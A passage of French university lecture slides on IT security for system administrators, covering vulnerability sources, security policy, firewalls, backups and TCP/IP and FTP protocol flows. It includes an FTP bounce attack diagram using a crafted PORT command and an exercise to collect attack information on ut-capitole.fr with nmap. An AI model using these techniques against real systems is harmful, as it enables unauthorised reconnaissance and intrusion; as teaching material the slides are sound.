Mauvaise conception (volontaire ou non)Peace and Love : REXECBackdoor : FSP,EGGDropIncompétence : WEPComplexité : OpenSSL, Bash, WPA2

Mauvaise configurationpostfix, DNS, HTTP

Mauvaise utilisationScripts php, cgi-bin incorrects

Mauvais utilisateursClickophileManque d’intelligence entre la chaise et le clavier

[email protected] Sécurité Informatique/ March 31, 2018 71 / 381

Page 72: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Heureusement

C’est super dur de trouver des failles

[email protected] Sécurité Informatique/ March 31, 2018 72 / 381

Page 73: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Site de recensement de failles

source http: // www. cvedetails. com

[email protected] Sécurité Informatique/ March 31, 2018 73 / 381

Page 74: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Heureusement

C’est super dur de trouver comment exploiter des failles

[email protected] Sécurité Informatique/ March 31, 2018 74 / 381

Page 75: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Site d’utilisation de failles

source http: // www. exploit-db. com

[email protected] Sécurité Informatique/ March 31, 2018 75 / 381

Page 76: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Heureusement

Les antivirus nous protègent.

[email protected] Sécurité Informatique/ March 31, 2018 76 / 381

Page 77: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les antivirus

[email protected] Sécurité Informatique/ March 31, 2018 77 / 381

Page 78: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Heureusement

Les grosses entreprises ne se font jamais pirater.

[email protected] Sécurité Informatique/ March 31, 2018 78 / 381

Page 79: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les plus grosses fuites de données

source http: // www. informationisbeautiful. net

[email protected] Sécurité Informatique/ March 31, 2018 79 / 381

Page 80: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les plus grosses fuites de données

sourcehttps: // www. csoonline. com/

[email protected] Sécurité Informatique/ March 31, 2018 80 / 381

Page 81: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Heureusement

On peut repérer les pirates quand ils cherchent des failles.

[email protected] Sécurité Informatique/ March 31, 2018 81 / 381

Page 82: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Shodan, Censys, Zoomeye etc.

http://www.shodan.iohttps://censys.iohttps://www.zoomeye.org

[email protected] Sécurité Informatique/ March 31, 2018 82 / 381

Page 83: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Définir les rôles : politique de sécurité

Que voulez-vous faire ?Qui fait quoi, comment et quand ?Les pièges à éviter

[email protected] Sécurité Informatique/ March 31, 2018 83 / 381

Page 84: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Que voulez-vous faire ?

Protéger contre la CIA/NSA/GRU ?Protéger contre des adversaires précis ?Protéger contre l’interne ?Protéger contre le "normal" ?N’oubliez jamais

Vous voulez assurer la survie de votre organisme

[email protected] Sécurité Informatique/ March 31, 2018 84 / 381

Page 85: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Qui aura le droit de faire quoi ?

Politique de sécuritéLe web est autorisé pour qui, pour quoi ?Qui peut utiliser la messagerie ?Qui définit les règles ?Qui les annonce et comment ?Quelles sont les sanctions ?

[email protected] Sécurité Informatique/ March 31, 2018 85 / 381

Page 86: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les pièges à eviter

Tenter l’impossibleFaire du tout sécuritaire

[email protected] Sécurité Informatique/ March 31, 2018 86 / 381

Page 87: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

A l’impossible nul n’est tenu

Efficacité

Coût :●Financier,●Compétence,●Désagréments

100%

0%

[email protected] Sécurité Informatique/ March 31, 2018 87 / 381

Page 88: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Eviter le tout sécuritaire

Fragilise votre soutien par la DGProvoque des tentatives de contournementsPréférer empêcher à interdire

RappelVotre but est que "votre organisme fonctionne" pas deconcurrencer Fort Knox

[email protected] Sécurité Informatique/ March 31, 2018 88 / 381

Page 89: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les priorités

Empêcher les agressions (volontaires ou non) : ProtectionRepérer les agressions: DétectionConfiner les agressions et limiter leurs conséquencesAccumuler les preuvesComprendre, apprendre, retenir (itération)Retour à la normale

[email protected] Sécurité Informatique/ March 31, 2018 89 / 381

Page 90: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La protection

Nous parlerons ici de la protection dite périmétriquePartie la plus efficace

70% à 80% d’attaques en moins (les choses changent)La moins coûteuse

en tempsen argenten compétence

La plus stable dans le tempsLa plus visible

[email protected] Sécurité Informatique/ March 31, 2018 90 / 381

Page 91: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La détection

La détection permet de réagirPermet de prévoir l’avenir

scan sur des ports inconnusanalyse des comportement anormaux

Permet de justifier les coûtsEn présentant correctement les informations

[email protected] Sécurité Informatique/ March 31, 2018 91 / 381

Page 92: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Confinement des agressions

"Réactif" en cas d’échec de protectionProtection en profondeurDoit être placé "en plus" avant la détection (proactif)De plus en plus utile avec les vers

[email protected] Sécurité Informatique/ March 31, 2018 92 / 381

Page 93: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Accumuler les preuves

OptionnelEn cas de recours en justice

A notre initiativeMais aussi à notre encontre

Tâche ingrate et rarement effectuéeRéputationArgentTemps

[email protected] Sécurité Informatique/ March 31, 2018 93 / 381

Page 94: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Comprendre, apprendre, retenir

L’attaque a réussiPourquoi ?Comment y remédier ?Parer à la faille utiliséeRéfléchir à une généralisation de cette faille

[email protected] Sécurité Informatique/ March 31, 2018 94 / 381

Page 95: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Remise en état

Plan de reprise/Plan de secoursSi elle est faite avant de comprendre

Vous ne pourrez apprendreVous n’aurez donc rien apprisVous resubirez l’attaque

Nécessité d’une machine à remonter le tempsPhase rarement testée

[email protected] Sécurité Informatique/ March 31, 2018 95 / 381

Page 96: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Collecte des informations : exercices

Exercice 1 : Ingénierie informationnelleCollecter toute information utile pour attaquer le domaineut-capitole.fr

Exercice 2 : jouons avec nmapDécouvrir les utilisations de NMAP, pour les ports, les applications,les versions.

[email protected] Sécurité Informatique/ March 31, 2018 96 / 381

Page 97: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Résolution des problèmes

La tronçonneuseLe ciseau à boisLe papier de verreLa lazure

[email protected] Sécurité Informatique/ March 31, 2018 97 / 381

Page 98: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La tronçonneuse

On enlève l’inutile :Protection contre l’extérieur;Protection contre l’intérieur;Protection à l’intérieur.

[email protected] Sécurité Informatique/ March 31, 2018 98 / 381

Page 99: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection contre l’extérieur

Travail effectué par le firewall :On bloque tout ce qui vient de l’extérieur;Hormis ce qui est spécifiquement autorisé;Le tout basé sur une notion de port;Les entrées sont limitées en rapidité;On jette et on n’avertit pas.

[email protected] Sécurité Informatique/ March 31, 2018 99 / 381

Page 100: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection contre l’intérieur

Tout est autorisé en sortie SAUFCe qui est offert en interne

DNS, SMTP, NTP, etc.Ce qui est dangereux pour l’extérieur

SNMP, Netbios, etc.Ce qui est illégal, non productif

P2P, pédopornographieJeux en ligne, pornographie

Les "zones ouvertes" qui doivent être contrôléesShow RoomWiFi

[email protected] Sécurité Informatique/ March 31, 2018 100 / 381

Page 101: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protection à l’intérieur

Travail effectué par un filtrage interne. Tout est autorisé enintra-établissement SAUF

Ce qui est dangereuxLes zones ouvertesLes zones fragiles doivent être injoignables

[email protected] Sécurité Informatique/ March 31, 2018 101 / 381

Page 102: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le ciseau à bois

On enlève ce que l’on sait dangereux dans ce qui est autoriséLe courrier électroniqueLe WebLes services en général

[email protected] Sécurité Informatique/ March 31, 2018 102 / 381

Page 103: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le courrier électronique

Le SMTP rentre maisIl ne rentre pas pour ressortirIl ne doit pas être vecteur de virusIl est analysé contre le spam (ou plutôt contre tout danger).

[email protected] Sécurité Informatique/ March 31, 2018 103 / 381

Page 104: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le Web

Le Web sort maisCertains sites sont interditsLes nids à virus sont inspectésOn journalise ce qui passe

[email protected] Sécurité Informatique/ March 31, 2018 104 / 381

Page 105: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les services

Certains services sont offerts, maisLes serveurs sont patchésIls remontent les anomaliesUn détecteur d’anomalies veilleOn limite les conséquences des anomalies

[email protected] Sécurité Informatique/ March 31, 2018 105 / 381

Page 106: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le reste

Le reste sort maisLimitation des débitsOn suit les connexions (journaux)

[email protected] Sécurité Informatique/ March 31, 2018 106 / 381

Page 107: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le papier de verre

On repère ce qui va être dangereux

[email protected] Sécurité Informatique/ March 31, 2018 107 / 381

Page 108: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les logs sont nos amis

Les journaux sont nos seuls amis. On va donc faire appel à euxpour

Les machines internes qui déclenchent des alertes.Les services qui sont auscultés par l’extérieurLes alertes récurrentes

[email protected] Sécurité Informatique/ March 31, 2018 108 / 381

Page 109: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les actions de salubrité publique

On abat les webmestres !

[email protected] Sécurité Informatique/ March 31, 2018 109 / 381

Page 110: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La lazure

On évite que le temps et les intempéries ne nous détruisent lamaison.

[email protected] Sécurité Informatique/ March 31, 2018 110 / 381

Page 111: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La machine à remonter le temps

On fait des sauvegardesOn vérifie qu’elles fonctionnentOn ne les place pas au même endroit que les serveursOn vérifie qu’elles pourront toujours fonctionner

[email protected] Sécurité Informatique/ March 31, 2018 111 / 381

Page 112: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La dynamo

On met en place la dynamoE.D.F. en temps de paix : 240 VoltsE.D.F. en temps de grève : 0 VoltE.D.F. en temps d’orage : 400 Volts

L’onduleur est votre ami. Vous devez l’écouter.

[email protected] Sécurité Informatique/ March 31, 2018 112 / 381

Page 113: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

On ferme à clé

Coût d’un pirate professionnel: 2000 e à 200 000 eCoût d’une femme de ménage : 100 e la journée

Moralité : fermez les portes.

Post scriptumTemps moyen pour fracturer une serrure de sécurité "simple" : 3 à30 secondes.

[email protected] Sécurité Informatique/ March 31, 2018 113 / 381

Page 114: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les protections réseau

Les protections réseau

[email protected] Sécurité Informatique/ March 31, 2018 114 / 381

Page 115: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Comment protéger ?

Dans un monde parfaitBien concevoir les servicesBien configurer les servicesBien les utiliser

Dans le monde réelLimiter les accès aux services nécessaires

En nombre de machinesEn nombre de services

Limiter les conséquences d’une intrusion

[email protected] Sécurité Informatique/ March 31, 2018 115 / 381

Page 116: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Mais garder à l’esprit

Une protection périmétrique ne protège pas :du WiFides portables infectésdes applications web infectées

[email protected] Sécurité Informatique/ March 31, 2018 116 / 381

Page 117: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

D’où l’idée

Séparer les services publics et les services internesLimiter la communication et la visibilité depuis l’extérieurObliger le passage par un point unique de contrôle => Lepare-feu

[email protected] Sécurité Informatique/ March 31, 2018 117 / 381

Page 118: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les pare-feux

De nombreux nomsFirewallGarde-BarrièresGatekeeper

Qu’est-ce que c’est ?Comment ça marche ?Evaluer et choisir un pare-feu

[email protected] Sécurité Informatique/ March 31, 2018 118 / 381

Page 119: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les pare-feux

Définition réseauxTypes de pare-feuxTypes d’architectureCritères de choixPerspectives

[email protected] Sécurité Informatique/ March 31, 2018 119 / 381

Page 120: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Politique de sécurité : le firewall

La sortieQui ?Pour quoi ?

L’entréeQui ?Pour quoi ?

[email protected] Sécurité Informatique/ March 31, 2018 120 / 381

Page 121: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Définitions

IPICMPLa notion de portTCPUDPProtocoles

[email protected] Sécurité Informatique/ March 31, 2018 121 / 381

Page 122: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

IP : Internet Protocol

Protocole de communicationActuellement en version IPv4IPv6 en cours de déploiement (Free depuis Décembre 2007)Chaque machine sur Internet a une adresse IP uniqueLes paquets se propagent de routeur en routeurProtocole non fiable mais résistant

[email protected] Sécurité Informatique/ March 31, 2018 122 / 381

Page 123: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

IP : Internet Protocol

Format d’une adresseClasses (obsolète)

A : de 1.0.0.0 à 127.255.255.255B : de 128.0.0.0 à 191.255.255.255C : de 192.0.0.0 à 223.255.255.255D : de 224.0.0.0 à 239.255.255.255 (Multicast)

Notion de CIDRClassless InterDomain RoutingPlus assez de classes C ou B disponibles193.49.48.0/24 ou 193.49.50.0/23

[email protected] Sécurité Informatique/ March 31, 2018 123 / 381

Page 124: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

IP : Internet Protocol

Ensemble de diverses adresses non disponibles : RFC3330 (exRFC1918)

Adresses privées non routables sur Internet10.0.0.0/8172.16.0.0/16 à 172.31.0.0/16192.168.0.0/24 à 192.168.255.0/24

Adresses spécifiques127.0.0.0/8224.0.0.0/4192.0.2.0/24169.254.0.0/16etc.

[email protected] Sécurité Informatique/ March 31, 2018 124 / 381

Page 125: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

IP : Internet Protocol

Adresse IP source

Adresse IP destination

Longueur totale en octets

Identification de fragment

VersionLongueur en-tête

Type de service (TOS)

flags 13-bit décalage fragment

TTL Protocole Somme de Contrôle d ’en-tête

Options éventuelles (timestamp, source routing, etc…)

Données

32 bits en codage « big endian »

20 octets

X fois

[email protected] Sécurité Informatique/ March 31, 2018 125 / 381

Page 126: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

ICMP : Internet Control Message Protocol

Protocole de signalisationService/machine/réseau injoignableDemande de ralentissement

Peut être utilisé pour les attaquesICMP RedirectICMP Echo

Attaque smurf

[email protected] Sécurité Informatique/ March 31, 2018 126 / 381

Page 127: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP/UDP: La notion de port

Le port est un numéro de 0 à 65535Lors d’une communication, le serveur et le client ont chacunun port utiliséChaque machine associe une communication à un quadruplet(IP-C/Port-C/IP-S/Port-S)

[email protected] Sécurité Informatique/ March 31, 2018 127 / 381

Page 128: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP/UDP : La notion de port (2)

DénominationPort destination : port du destinatairePort source : port de l’expéditeur (provenance du paquet)

[email protected] Sécurité Informatique/ March 31, 2018 128 / 381

Page 129: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP/UDP : La notion de port (3)

Les ports sont définis par le IANA (http://www.iana.org)De 1 à 1023 : well known ports ( < et > 512)

TCP/23 : telnetUDP/53 : DNS

de 1024 à 49151 : user (registered) portsTCP/3128 : SquidUDP/2049 : NFS

de 49152 à 65535 : dynamics or private ports

[email protected] Sécurité Informatique/ March 31, 2018 129 / 381

Page 130: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP/UDP : La notion de port (4)

Hormis cas exceptionnel, une communication a lieu entre un porthaut et un port bas

Port du serveur généralement < 1024, toujours < 49152Port du client toujours supérieur à 1023, parfois >=49152

[email protected] Sécurité Informatique/ March 31, 2018 130 / 381

Page 131: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP/UDP : Schéma

Client65535

…4915249151

…10241023…1

Serveur65535…4915249151…10241023…1

[email protected] Sécurité Informatique/ March 31, 2018 131 / 381

Page 132: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP : Transport Control Protocol

Protocole connectéAssure la cohérence de la connexionA un début et une fin

Un "triple handshake" initialise la connexionL’aléa du numéro de séquence n’est pas toujours bonS’il est prévisible, on peut "simuler" une connexion

[email protected] Sécurité Informatique/ March 31, 2018 132 / 381

Page 133: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP : Schéma

Client ServeurSYN (1000)

SYN (2000),ACK(1001)

ACK(2001)

Communication Etablie

Tout paquet possède un ACK

ACK (2300), FIN(1500)

ACK(1501)

ACK(1501),FIN(2300)

ACK(2301)

Choix duChoix duN° SEQN° SEQ

Choix duChoix duN° SEQN° SEQ

[email protected] Sécurité Informatique/ March 31, 2018 133 / 381

Page 134: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

UDP :User Datagram Protocol

Protocole non connectéL’application se débrouille

En cas de désordreEn cas de perte de paquet

Plus rapidePas d’attente d’acquittementPeut être utilisé pour du multicast

[email protected] Sécurité Informatique/ March 31, 2018 134 / 381

Page 135: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

TCP : Schéma

WWW, FTP, SMTP, etc... TFTP, SNMP, etc...

TCP (95%) UDP (5%)

IP

Couche physique (ethernet, ppp, etc...)

ICMP (<1%)

DNS, Netmeeting

[email protected] Sécurité Informatique/ March 31, 2018 135 / 381

Page 136: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocoles applicatifs

Situés au dessus des couches TCP et UDPIls ont des ordres spécifiques à leur fonctionSouvent ce sont des ordres "lisibles"

SMTP (HELO, DATA, MAIL FROM, etc ...)Plus ou moins complexes

Port unique fixe (http, smtp, pop, dns, ...)Port(s) dynamique(s) (ftp, irc, h323, ...)

[email protected] Sécurité Informatique/ March 31, 2018 136 / 381

Page 137: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocole simple : HTTP

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1

Aléa 1

Aléa 1

Aléa 1

80

80

80

80

Etablissement de la connexion

GET http://…..html HTTP/1.0\n\n

<HTML><HEAD>..</HTML>

Coupure de connexion

[email protected] Sécurité Informatique/ March 31, 2018 137 / 381

Page 138: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocole complexe FTP actif

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

X*256+Y

Aléa 1

X*256+Y

21

21

21

21

21

21

21

20

21

20

Etablissement de la connexion

USER ANONYMOUS

331 Enter Password

PASS [email protected]

230 Guest Login OK

PORT 1,2,3,4,X,Y

200 Port OK

Etablissement de la connexion

GET fichier

données du fichier

[email protected] Sécurité Informatique/ March 31, 2018 138 / 381

Page 139: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocole complexe FTP actif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

X*256+Y

Aléa 1

X*256+Y

21

21

21

21

21

21

21

20

21

20

Etablissement de la connexion

USER ANONYMOUS

331 Enter Password

PASS [email protected]

230 Guest Login OK

PORT 1,2,3,4,X,Y

200 Port OK

Etablissement de la connexion

GET fichier

données du fichier

[email protected] Sécurité Informatique/ March 31, 2018 139 / 381

Page 140: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocole complexe FTP passif

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 2

Aléa 1

Aléa 2

21

21

21

21

21

21

21

X*256+Y

21

X*256+Y

Etablissement de la connexion

USER ANONYMOUS

331 Enter Password

PASS [email protected]

230 Guest Login OK

PASV

227 Passive 5,6,7,8,X,Y

Etablissement de la connexion

GET fichier

données du fichier

Client : 1.2.3.4 Serveur : 5.6.7.8

[email protected] Sécurité Informatique/ March 31, 2018 140 / 381

Page 141: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Protocole complexe FTP passif (flux)

Client : 1.2.3.4 Serveur : 5.6.7.8

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 1

Aléa 2

Aléa 1

Aléa 2

21

21

21

21

21

21

21

X*256+Y

21

X*256+Y

Etablissement de la connexion

USER ANONYMOUS

331 Enter Password

PASS [email protected]

230 Guest Login OK

PASV

227 Passive 5,6,7,8,X,Y

Etablissement de la connexion

GET fichier

données du fichier

[email protected] Sécurité Informatique/ March 31, 2018 141 / 381

Page 142: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques protocolaires : FTP

Pirate1.2.3.4

Serveur FTP5.6.7.8

Aléa 1

Aléa 1

Aléa 1

Aléa 1

21

21

20

20

PORT 9,8,7,6,0,25

200 Port OK

Serveur SMTP"caché"9.8.7.6

25

25

25

25

[email protected] Sécurité Informatique/ March 31, 2018 142 / 381

Page 143: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les pare-feux

Les filtres de paquetsLes statefulLes deep inspectionLes IPS

[email protected] Sécurité Informatique/ March 31, 2018 143 / 381

